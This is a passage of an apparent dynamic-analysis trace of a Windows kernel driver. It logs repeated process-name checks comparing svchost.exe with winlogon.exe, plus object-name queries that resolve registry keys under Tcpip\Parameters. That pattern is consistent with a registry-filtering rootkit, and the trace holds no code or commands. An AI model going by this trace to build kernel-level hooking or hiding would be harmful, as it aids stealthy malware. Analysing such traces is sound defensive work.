| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8cabfa0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b8cabfa0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002aa70fb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x94, ret_val_ptr_out = 0xffffe0003af83ef0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8cabfa0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b8cabfa0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002aa70c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x92, ret_val_ptr_out = 0xffffe0003af95f60 |
| ObQueryNameString | Object_ptr = 0xffffc000b8cabfa0, Length = 0x92, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd0002aa70c98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7d55080, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7d55080, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002aa70fb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7d55080, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7d55080, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002aa70c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 |
| ObQueryNameString | Object_ptr = 0xffffc000b7d55080, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002aa70c98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0c0c20, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0c0c20, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002aa70fb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0c0c20, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0c0c20, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002aa70c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 |
